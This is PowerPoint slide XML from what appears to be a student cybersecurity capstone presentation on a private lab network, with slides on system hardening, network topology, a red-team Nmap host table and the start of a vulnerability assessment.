                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="4400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>System Hardening</a:t>
            </a:r>
            <a:endParaRPr sz="4400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="1" indent="-508000">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="4400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Removing the ability to upload files to this directory over the web interface would take care of this issue. </a:t>
            </a:r>
            <a:endParaRPr sz="3600" b="1"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04"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1675963" y="4759216"/>
            <a:ext cx="21025800" cy="2193600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="182825" tIns="91375" rIns="182825" bIns="91375" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="15000"/>
              <a:buFont typeface="Helvetica Neue"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="12800"/>
              <a:t>FIN</a:t>
            </a:r>
            <a:endParaRPr sz="96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34"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1337" name="Google Shape;1337;p85"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="18827496" y="2446221"/>
            <a:ext cx="4802416"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endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>NETWORK</a:t>
            </a:r>
            <a:endParaRPr sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Address Range: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>192.168.1.0/24</a:t>
            </a:r>
            <a:endParaRPr sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent4">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Netmask: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>255.255.255.0</a:t>
            </a:r>
            <a:endParaRPr sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent4">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Gateway: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>192.168.1.0</a:t>
            </a:r>
            <a:endParaRPr sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent4">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>MACHINES</a:t>
            </a:r>
            <a:endParaRPr sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>IPv4:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>192.168.1.90</a:t>
            </a:r>
            <a:endParaRPr sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent4">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>OS: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Linux Kali 5.4.0</a:t>
            </a:r>
            <a:endParaRPr sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent4">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Hostname: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Kali</a:t>
            </a:r>
            <a:endParaRPr sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent4">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IPv4: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>192.168.1.105</a:t>
            </a:r>
            <a:endParaRPr sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent4">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OS: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Ubuntu 18.04.1</a:t>
            </a:r>
            <a:endParaRPr sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent4">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Hostname: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Capstone</a:t>
            </a:r>
            <a:endParaRPr sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent4">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IPv4: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>192.168.1.100</a:t>
            </a:r>
            <a:endParaRPr sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent4">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OS: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Windows 10</a:t>
            </a:r>
            <a:endParaRPr sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent4">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Hostname: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>ML-RefVM-684427</a:t>
            </a:r>
            <a:endParaRPr sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent4">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1335" name="Google Shape;1335;p85"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2" descr="A screenshot of a social media post&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CE228245-9CEA-487A-8251-36C9B5C6AA6A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="872744" y="2477833"/>
            <a:ext cx="17707864" cy="100338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86"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1675963" y="4759216"/>
            <a:ext cx="21025800" cy="2193600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="182825" tIns="91375" rIns="182825" bIns="91375" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="15000"/>
              <a:buFont typeface="Helvetica Neue"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="12800"/>
              <a:t>Red Team</a:t>
            </a:r>
            <a:endParaRPr sz="12800"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="15000"/>
              <a:buFont typeface="Helvetica Neue"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="9600" b="0"/>
              <a:t>Infiltrating the Target</a:t>
            </a:r>
            <a:endParaRPr sz="9600"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47"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1348" name="Google Shape;1348;p87"/>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Recon: Describing the Target</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1349" name="Google Shape;1349;p87"/>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1350" name="Google Shape;1350;p8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t>NMap Scan Results</a:t>
            </a:r>
            <a:endParaRPr sz="4400"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400"/>
              <a:t>Nmap identified the following hosts on the network.</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1351" name="Google Shape;1351;p87"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1825627270"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="952475" y="5905500"/>
          <a:ext cx="21995625" cy="3413640"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
                <a:tableStyleId>{29D82A68-96A6-43CD-8B4E-EC5E3386A180}</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t>Hostname</a:t>
                      </a:r>
                      <a:endParaRPr sz="4400" b="1"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91425" marR="91425" marT="91425" marB="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="4400" b="1"/>
                        <a:t>IP Address</a:t>
                      </a:r>
                      <a:endParaRPr sz="4400" b="1"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91425" marR="91425" marT="91425" marB="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="4400" b="1"/>
                        <a:t>Role on Network</a:t>
                      </a:r>
                      <a:endParaRPr sz="44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4400" dirty="0"/>
                        <a:t>Linux Kali</a:t>
                      </a:r>
                      <a:endParaRPr sz="4400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91425" marR="91425" marT="91425" marB="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="4400" dirty="0"/>
                        <a:t>192.168.1.90</a:t>
                      </a:r>
                      <a:endParaRPr sz="4400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91425" marR="91425" marT="91425" marB="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="4400" dirty="0"/>
                        <a:t>Attacker Machine</a:t>
                      </a:r>
                      <a:endParaRPr sz="44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4400" dirty="0"/>
                        <a:t>Linux Ubuntu</a:t>
                      </a:r>
                      <a:endParaRPr sz="4400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91425" marR="91425" marT="91425" marB="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="4400" dirty="0"/>
                        <a:t>192.168.1.105</a:t>
                      </a:r>
                      <a:endParaRPr sz="4400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91425" marR="91425" marT="91425" marB="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="4400" dirty="0"/>
                        <a:t>Target Machine</a:t>
                      </a:r>
                      <a:endParaRPr sz="4400" dirty="0"/>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4400" dirty="0"/>
                        <a:t>Windows 10 VM</a:t>
                      </a:r>
                      <a:endParaRPr sz="4400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91425" marR="91425" marT="91425" marB="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="4400" dirty="0"/>
                        <a:t>192.168.1.100</a:t>
                      </a:r>
                      <a:endParaRPr sz="4400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91425" marR="91425" marT="91425" marB="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="4400" dirty="0"/>
                        <a:t>ELK Server</a:t>
                      </a:r>
                      <a:endParaRPr sz="44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55"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1356" name="Google Shape;1356;p88"/>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Vulnerability Assessment</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1357" name="Google Shape;1357;p88"/>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1358" name="Google Shape;1358;p8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t>Our assessment uncovered the following critical </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0" err="1"/>
              <a:t>vulnerablities</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0"/>
              <a:t> in the target.</a:t>
            </a:r>
            <a:endParaRPr sz="4400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="4400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="4400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="1359" name="Google Shape;1359;p88"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3781977865"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
